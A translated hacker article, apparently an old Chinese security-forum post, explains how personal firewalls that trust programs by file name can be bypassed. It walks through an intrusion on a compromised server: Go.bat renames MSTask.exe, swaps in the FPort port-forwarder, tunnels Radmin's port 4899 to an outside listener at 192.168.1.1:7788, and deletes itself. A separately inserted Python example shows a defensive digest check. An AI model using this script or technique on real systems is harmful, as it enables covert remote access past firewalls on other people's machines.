I've always had a dream: how nice it would be to find a few loopholes or bugs! So I spent all day buried in the computer doing research. Research on what? On how to break through firewalls (by firewall I mean software personal firewalls; I don't have the means to test hardware ones). And you know what, the research wasn't wasted: I really did find that most common firewalls share one bug. This bug lets us deceive the firewall and get an outbound connection. What exactly is going on? Take a look at the explanation below!
First, a feature of Windows: while a program is running it cannot be deleted, but it can be renamed! And when a system-protected program is deleted, damaged or renamed, the system promptly restores it from its backup copy. Now to firewalls. As we all know, the "application rules" of many firewalls by default allow IE (iexplore.exe), Outlook Express (Msimn.exe), Lsass.exe, Spoolsv.exe, MSTask.exe, Winlogon.exe, Services.exe and Svchost.exe through, and most firewalls decide whether to allow a program simply by checking that its path and file name match the rule. They never consider what happens if a different file is swapped in under that name, the equivalent of the face-changing disguise in old costume films: change the face and you are taken for someone else! This gives us an opportunity: we can use this bug to deceive the firewall and get outbound access!
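The weakness described above is an allow rule keyed on path and file name alone. The following Python is an added example, not code from the article or from any firewall product, that contrasts such a name-based rule with one that also binds the trusted name to the SHA-256 digest of the binary recorded when the rule was created. The directory layout, file names and file contents are constructed stand-ins, and the functions (enroll, allowed_by_name, allowed_by_digest) are hypothetical.

```python
import hashlib
import os
import tempfile

# Names the article says personal firewalls trusted by default (hypothetical rule set).
TRUSTED_NAMES = {
    "iexplore.exe", "msimn.exe", "lsass.exe", "spoolsv.exe",
    "mstask.exe", "winlogon.exe", "services.exe", "svchost.exe",
}


def sha256_of(path):
    """Stream a file through SHA-256 and return the hex digest."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def allowed_by_name(path):
    """Weak rule: trust anything whose file name is on the list."""
    return os.path.basename(path).lower() in TRUSTED_NAMES


def enroll(paths):
    """Hardened rule, step 1: record each trusted binary's digest when the rule is created."""
    return {os.path.basename(p).lower(): sha256_of(p) for p in paths}


def allowed_by_digest(path, enrolled):
    """Hardened rule, step 2: the name must be enrolled AND the content must be unchanged."""
    name = os.path.basename(path).lower()
    return name in enrolled and sha256_of(path) == enrolled[name]


def demo():
    """Replay the rename-and-replace trick against both rules.

    Returns ((name_before, digest_before), (name_after, digest_after)).
    """
    with tempfile.TemporaryDirectory() as root:
        system32 = os.path.join(root, "system32")  # constructed stand-in for the system directory
        os.mkdir(system32)
        trusted = os.path.join(system32, "MSTask.exe")
        with open(trusted, "wb") as f:
            f.write(b"CONSTRUCTED: stand-in for the genuine scheduler binary\n")

        enrolled = enroll([trusted])
        before = (allowed_by_name(trusted), allowed_by_digest(trusted, enrolled))

        # The swap the article describes: the real file is renamed out of the way
        # and a different file appears under the trusted name.
        os.rename(trusted, os.path.join(system32, "MSTask1.exe"))
        with open(trusted, "wb") as f:
            f.write(b"CONSTRUCTED: some other program wearing the trusted name\n")

        after = (allowed_by_name(trusted), allowed_by_digest(trusted, enrolled))
        return before, after


if __name__ == "__main__":
    (n0, d0), (n1, d1) = demo()
    print(f"genuine file: name rule={n0}, digest rule={d0}")
    print(f"swapped file: name rule={n1}, digest rule={d1}")
```

Before the swap both rules accept the genuine binary; after it the name rule still says yes while the digest rule refuses, and the mismatch between an enrolled digest and the file currently sitting under that name is exactly the event worth alerting on.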
A bit of background: in fact, most Trojans that use DLL thread-injection rely on this same principle. They first covertly start a process the firewall has certified and allowed (such as an Iexplore.exe process), inject their DLL into it as a thread, and then access the outside world, easily passing the firewall's restrictions, because the firewall does not intercept a program it has certified as allowed.
That's the principle; now let's talk about how to use this bug! I used a virtual machine for the experiment and set up the following conditions:
To make it more realistic, I installed on the server "Skynet Firewall", Radmin (but because the firewall restricts the IP addresses allowed to access it, a normal connection is impossible!), MSSQL SERVER and Serv-U. First, we use the usual port-forwarding method and see how the firewall responds!
The first step is to start FPort from Angelshell Ver 1.0 (the server component used for port forwarding, which can forward almost any port), and then listen locally with fportclient (the port-forwarding client)!
The second step: run "E:\www\fport.exe 4899 192.168.1.1 7788" directly in the Cmdshell. We see that "Skynet" on the virtual machine immediately intercepts FPort.
See! Because FPort is not a certified, allowed program, the firewall intercepts it immediately! OK, now let's carry out the deception plan and see how I break through the firewall. Do the first step as before, then create a new batch file with the following contents:
ren MSTask.exe MSTask1.exe
ren fport.exe MSTask.exe
MSTask.exe 4899 192.168.1.1 7788
del %0
Name it Go.bat, then use Sqlrootkit to copy "Fport.exe" and Go.bat to c:\winnt\system32\ on the target machine (that is, the directory where Mstask is located), and execute Go.bat from Sqlrootkit (note that renaming MSTask.exe requires administrator privileges).
When Fportclient shows "You have received a connection from a remote computer!", connect to local port 4899 with the Radmin client.
We have successfully broken through the restriction (the firewall does not restrict local connections to port 4899; we use FPort to forward that port, so logging in is equivalent to a local connection, and the connection succeeds). So FPort, which could not get past the firewall on its own, became a "thread"-style port-forwarding tool!
In my experiments, domestic firewalls almost without exception "have" this bug! Although the bug does not cause great harm by itself, it always hands an intruder an opportunity to compromise us!
WTF boss said that enjoying something alone is not as good as enjoying it together, so I'm publishing this anyway: first, so that our domestic firewalls can improve, and second, as a wake-up call to network administrators! My skills are limited, so there are bound to be mistakes, and I welcome your criticism.